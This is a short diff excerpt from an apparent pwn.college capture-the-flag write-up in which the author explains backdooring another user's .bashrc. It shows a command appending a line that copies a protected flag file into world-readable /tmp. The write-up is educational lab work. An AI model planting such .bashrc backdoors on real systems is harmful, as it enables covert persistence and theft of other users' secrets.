h011o/pwn.college_Madhav/Silly Shenanigans/Challenges.md

 hacker@shenanigans~bashrc-backdoor:~$ cat /home/hacker/stolen_flag
 ```

 which still gave no output.
-The problem here was that zardus lacked permissions.
+The problem here was that zardus still lacked permissions.
 So I did a little bit of research and learned about a special directory where anyone can read or write files - /tmp

 ```bash
 hacker@shenanigans~bashrc-backdoor:~$ echo 'cat /flag > /tmp/stolen_flag' >> /home/zardus/.bashrc